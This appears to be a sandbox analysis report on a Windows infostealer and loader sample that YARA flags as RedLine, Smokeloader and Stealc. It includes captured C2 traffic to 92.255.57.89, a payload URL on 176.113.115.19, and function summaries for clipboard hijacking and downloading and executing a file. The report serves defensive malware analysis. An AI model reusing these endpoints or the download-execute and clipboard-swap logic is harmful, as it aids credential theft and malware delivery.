Dec 10, 2024 17:42:14.045897961 CET	412	OUT	POST /45c616e921a794b8.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGIJECGDGCBKECAKFBGC Host: 92.255.57.89 Content-Length: 213 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 44 41 38 38 32 30 43 34 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 2d 2d 0d 0a Data Ascii: ------DGIJECGDGCBKECAKFBGCContent-Disposition: form-data; name="hwid"C0DA8820C40F807656615------DGIJECGDGCBKECAKFBGCContent-Disposition: form-data; name="build"default------DGIJECGDGCBKECAKFBGC--
Dec 10, 2024 17:42:14.485032082 CET	210	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 16:42:14 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	104.21.56.70	443	3076	C:\Users\user\Desktop\ief722WreR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 16:42:07 UTC	90	OUT	GET /track_prt.php?sub=0&cc=DE HTTP/1.1 User-Agent: ShareScreen Host: post-to-me.com
2024-12-10 16:42:07 UTC	799	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 16:42:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tlYE1Qug7JTLNcVlIBqwHyvhykKgsbbrN3sQOyRte7IqPWazRcO18DhZ3RxKPo%2FumXeXynQpljSrOIp9jkG%2B3CGtqOjNLlhj0Btw47s0KWU5p%2BeYAa0oCb8VAbjxW5OqPA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efeafb2f8b44387-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1598&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=728&delivery_rate=1792510&cwnd=47&unsent_bytes=0&cid=5de7fe60112d980f&ts=734&x=0"
2024-12-10 16:42:07 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-10 16:42:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	11:42:02
Start date:	10/12/2024
Path:	C:\Users\user\Desktop\ief722WreR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ief722WreR.exe"
Imagebase:	0x400000
File size:	429'568 bytes
MD5 hash:	0B9795BC5978C62899793B157271E979
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3676143282.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	11:42:09
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Local\Temp\DADE.tmp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\DADE.tmp.exe"
Imagebase:	0x400000
File size:	303'104 bytes
MD5 hash:	017E73F6839555AA663A62235A81B433
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.1934099181.0000000000A58000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000008.00000003.1314965093.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000008.00000002.1934122632.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	13:18:29
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 564 -s 1096
Imagebase:	0x460000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	4.4%
Signature Coverage:	6.7%
Total number of Nodes:	639
Total number of Limit Nodes:	20

Executed Functions

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 004016E6
Sleep.KERNEL32(00001541,0000004C), ref: 004016F0

Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27

OpenClipboard.USER32(00000000), ref: 0040171D
GetClipboardData.USER32(00000001), ref: 0040172D
GlobalLock.KERNEL32(00000000), ref: 0040173C
_strlen.LIBCMT ref: 00401749
_strlen.LIBCMT ref: 00401778
_strlen.LIBCMT ref: 004018BC
EmptyClipboard.USER32 ref: 004018D2
GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
GlobalLock.KERNEL32(00000000), ref: 004018FD
GlobalUnlock.KERNEL32(00000000), ref: 00401909
SetClipboardData.USER32(00000001,00000000), ref: 00401912
GlobalFree.KERNEL32(00000000), ref: 00401919
CloseClipboard.USER32 ref: 0040193D
Sleep.KERNEL32(000002D2), ref: 00401948

Strings

i, xrefs: 00401759

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: i
API String ID: 1583243082-3865851505
Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
CloseHandle.KERNEL32(00000000), ref: 00402B07
ShellExecuteExW.SHELL32(?), ref: 00402B68
WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
CloseHandle.KERNEL32(?), ref: 00402B89
InternetCloseHandle.WININET(00000000), ref: 00402B92
InternetCloseHandle.WININET(00000000), ref: 00402B95

Strings

.exe, xrefs: 00402A6B
<, xrefs: 00402B45
ShareScreen, xrefs: 00402A12

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: .exe$<$ShareScreen
API String ID: 3323492106-493228180
Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4

Function 00AF9C8E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00AF9CB6
Module32First.KERNEL32(00000000,00000224), ref: 00AF9CD6

Memory Dump Source

Source File: 00000000.00000002.3676143282.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AF9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_af9000_ief722WreR.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: d082efff67586f47a41cb68a27ba35ab69374b1cd4d5f75ddaba2fead1d9a9bd
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: CAF062351007196FD7203BF9998DBBBB6E8AF49724F100529F742921C0DA70EC468A61

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

GetLastError.KERNEL32 ref: 0043D150
__dosmaperr.LIBCMT ref: 0043D157
GetFileType.KERNEL32(00000000), ref: 0043D163
GetLastError.KERNEL32 ref: 0043D16D
__dosmaperr.LIBCMT ref: 0043D176
CloseHandle.KERNEL32(00000000), ref: 0043D196
CloseHandle.KERNEL32(?), ref: 0043D2E0
GetLastError.KERNEL32 ref: 0043D312
__dosmaperr.LIBCMT ref: 0043D319

Strings

H, xrefs: 0043D29E

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

Function 0248003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0248024D

Strings

cess, xrefs: 0248018D
kernel32.dll, xrefs: 0248008F, 02480095

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 7b1ad8852e436fc1817e3e2aa783fdc326378ef2b8c29df7ba1e42edb9faaceb
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 9B527A74A11229DFDB64CF58C984BADBBB1BF09304F1480DAE50DAB351DB30AA89CF14

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
InternetCloseHandle.WININET(00000000), ref: 00402E4B
InternetCloseHandle.WININET(00000000), ref: 00402E4E

Strings

&cc=DE, xrefs: 00402DB4, 00402DBA, 00402E17
https://post-to-me.com/track_prt.php?sub=, xrefs: 00402C57, 00402D83, 00402DF2
ShareScreen, xrefs: 00402C22

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Internet$CloseHandleOpen_wcslen
String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
API String ID: 3067768807-1501832161
Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Cnd_init.LIBCPMT ref: 004051E4
__Mtx_init.LIBCPMT ref: 0040520A
std::_Cnd_initX.LIBCPMT ref: 0040522D
__Thrd_start.LIBCPMT ref: 00405252
std::_Cnd_waitX.LIBCPMT ref: 00405272
std::_Cnd_initX.LIBCPMT ref: 0040529F

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Cnd_initX.LIBCPMT ref: 0040581C
__Cnd_signal.LIBCPMT ref: 00405828
std::_Cnd_initX.LIBCPMT ref: 0040583D
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ErrorExitLastThread
String ID: F(@
API String ID: 1611280651-2698495834
Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
__dosmaperr.LIBCMT ref: 0042E170

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
__dosmaperr.LIBCMT ref: 0043479F

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC

ExitThread.KERNEL32 ref: 0042E086
CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
String ID:
API String ID: 1198197534-0
Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
PostQuitMessage.USER32(00000000), ref: 00402563

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: MessagePostProcQuitWindow
String ID:
API String ID: 3873111417-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001D1B), ref: 00401562

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

Strings

http://176.113.115.19/ScreenUpdateSync.exe, xrefs: 0040156D, 004016A6

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: _wcslen$Sleep
String ID: http://176.113.115.19/ScreenUpdateSync.exe
API String ID: 3358372957-3120454669
Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E

Function 00402960 Relevance: 3.0, APIs: 2, Instructions: 49COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040298F
__fassign.LIBCMT ref: 0040299F

Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
String ID:
API String ID: 2843524283-0
Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8

Function 02480E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,02480223,?,?), ref: 02480E19
SetErrorMode.KERNEL32(00000000,?,?,02480223,?,?), ref: 02480E1E

Memory Dump Source

